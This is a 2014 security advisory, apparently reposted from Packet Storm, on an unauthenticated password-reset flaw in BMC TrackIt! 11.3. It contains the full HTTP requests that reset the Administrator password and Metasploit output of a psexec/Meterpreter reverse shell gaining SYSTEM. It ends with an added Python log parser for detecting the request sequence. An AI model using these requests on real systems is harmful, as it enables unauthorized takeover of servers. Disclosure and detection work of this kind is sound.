BMC TrackIt! 11.3 Unauthenticated Local User Password Change

Reported by Brandon Perry, 11 Dec 2014. Source: packetstorm (packetstormsecurity.com)

BMC TrackIt! 11.3 Unauthenticated Local User Password Change allows remote shell access

Code
`BMC TrackIt! 11.3 Unauthenticated Local User Password Change  
Trial available here: http://www.trackit.com  
  
A Metasploit pull request has been made here:  
https://github.com/rapid7/metasploit-framework/pull/4359  
  
BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticated  
user to change any local user's password, such as Administrator. If the  
ability to log in remotely via SMB is enabled on the server, this can yield  
an unauthenticated user a shell of SYSTEM using the psexec module in  
Metasploit. This was tested against Windows Server 2008 R2 in a relatively  
default (trackit installs SQL server) installation. A domain was set up and  
the web server was added to the domain. Domain credentials were not able to  
be set, only local users.  
  
Using the Registration link in the top right of the  
/PasswordReset/Application/Main page, the UI requires the user's password  
to continue. However, the request made after to actually register the local  
user is disparate from the authentication request and can be sent  
independently. This allows an unauthenticated user to now reset that user's  
password. Because the Password Reset form makes a separate distinct request  
to check the answers to the secret question, the request to actually change  
a user's password can be made as any user.  
  
The first request looks like:  
  
POST /PasswordReset/Application/Register HTTP/1.1  
Host: 192.168.1.57  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.1.57/PasswordReset  
Content-Length: 318  
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
domainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd%40fdsafdsa.com&userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=not  
  
A valid ASP.NET_SessionId is required: a GET to /PasswordReset/ returns one  
in a Set-Cookie header, and that value must be sent as the cookie in all  
subsequent requests. The domainname parameter can be the name of the  
computer, which is the default value on the registration page. The userName  
parameter is the user to register with the application. You can attempt this  
with a user already registered with no issue (though changing the secret  
answers to known values is probably bad too).  
  
The second request looks like this:  
  
POST /PasswordReset/Application/ResetPassword HTTP/1.1  
Host: 192.168.1.57  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.1.57/PasswordReset/Application/Main  
Content-Length: 92  
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=Administrator  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
newPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=true  
  
The domain and UserName parameters should match those supplied in the  
previous registration request. The newPassword parameter will need to meet  
any local standard enforced by GPO.  
  
Combining these two requests will allow an unauthorised user to register a  
local user to be eligible for a password reset via the password reset form,  
then take advantage of the subsequent password reset vulnerability to  
change the password of any local user, including Administrator.  
  
Supplied is a Metasploit auxiliary module which will change the password of  
the Administrator user by default, then print the domain, username, and  
password to use with psexec in order to log in over SMB.  
  
The below Metasploit run details changing the password with the attached  
module. Setting the password to the one reported by the auxiliary module,  
psexec is run again and a shell as NT USER/SYSTEM is gained.  
  
  
msf auxiliary(bmc_trackit_pwd_reset) > show options  
  
Module options (auxiliary/gather/bmc_trackit_pwd_reset):  
  
Name       Current Setting  Required  Description  
----       ---------------  --------  -----------  
DOMAIN                      no        The domain of the user. By default  
                                      the local user's computer name will be autodetected  
LOCALUSER  Administrator    yes       The local user to change password  
                                      for  
Proxies                     no        Use a proxy chain  
RHOST      192.168.1.57     yes       The target address  
RPORT      80               yes       The target port  
TARGETURI  /                yes       The path to BMC TrackIt  
VHOST                       no        HTTP server virtual host  
  
msf auxiliary(bmc_trackit_pwd_reset) > run  
  
[*] Please run the psexec module using:  
[*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1  
[*] Auxiliary module execution completed  
msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec  
  
msf exploit(psexec) >  
msf exploit(psexec) > set SMBPass qGSvnJeuNO!1  
SMBPass => qGSvnJeuNO!1  
msf exploit(psexec) > exploit  
  
[*] Started reverse handler on 192.168.1.31:4444  
[*] Connecting to the server...  
[*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'...  
[*] Uploading payload...  
[*] Created \fNRBQEMV.exe...  
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl] ...  
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl] ...  
[*] Obtaining a service manager handle...  
[*] Creating a new service (NOAlMwJR - "MBvX")...  
[*] Closing service handle...  
[*] Opening service...  
[*] Starting the service...  
[*] Removing the service...  
[*] Closing service handle...  
[*] Deleting \fNRBQEMV.exe...  
[*] Sending stage (769024 bytes) to 192.168.1.57  
[*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668) at 2014-10-12 00:44:12 -0500  
  
meterpreter > getuid  
Server username: NT AUTHORITY\SYSTEM  
meterpreter >  
  
--   
http://volatile-minds.blogspot.com -- blog  
http://www.volatileminds.net -- website  
  
  
`
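For defenders, an added example (not part of the advisory or its Metasploit module) that parses constructed IIS W3C log lines and flags any client that POSTs to the Register endpoint and then to ResetPassword within a short window, which is the two-request sequence the advisory describes. Standard IIS logs carry neither request bodies nor cookies, so the affected user name is not visible; the log column set and the five-minute window are assumptions.

```python
from datetime import datetime

# Constructed IIS W3C sample (not real traffic); only the columns named in the
# '#Fields:' directive are used. Real logs carry more fields but no body/cookies.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2014-10-12 05:40:01 GET /PasswordReset/ 192.168.1.31 200
2014-10-12 05:40:03 POST /PasswordReset/Application/Register 192.168.1.31 200
2014-10-12 05:40:04 POST /PasswordReset/Application/ResetPassword 192.168.1.31 200
2014-10-12 06:10:00 GET /PasswordReset/Application/Main 192.168.1.77 200
2014-10-12 06:15:30 POST /PasswordReset/Application/ResetPassword 192.168.1.77 200
"""

# Endpoints named in the advisory; compared lower-cased since IIS paths are case-insensitive.
REGISTER_URI = "/passwordreset/application/register"
RESET_URI = "/passwordreset/application/resetpassword"


def parse_w3c(text):
    """Yield (timestamp, method, uri_stem, client_ip, status) per log line; the
    '#Fields:' directive gives the column order and other '#' lines are skipped."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        row = dict(zip(fields, line.split()))
        ts = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        yield ts, row["cs-method"], row["cs-uri-stem"].lower(), row["c-ip"], int(row["sc-status"])


def find_reset_chains(text, window_seconds=300):
    """Return [(client_ip, register_ts, reset_ts)] for every client that POSTed to
    Register and then to ResetPassword within window_seconds, both answered 2xx.
    A lone ResetPassword POST (a registered user answering their questions) is
    not flagged; the Register -> ResetPassword pair is the sequence described above."""
    last_register = {}  # client_ip -> timestamp of its latest successful Register POST
    chains = []
    for ts, method, uri, ip, status in parse_w3c(text):
        if method != "POST" or not 200 <= status < 300:
            continue
        if uri == REGISTER_URI:
            last_register[ip] = ts
        elif uri == RESET_URI and ip in last_register:
            if (ts - last_register[ip]).total_seconds() <= window_seconds:
                chains.append((ip, last_register[ip], ts))
    return chains
```

Feed it a real W3C log with the same six columns present (IIS lets you pick logged fields) and each returned tuple is one client worth reviewing; 192.168.1.77 above is a normal reset and is not reported.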
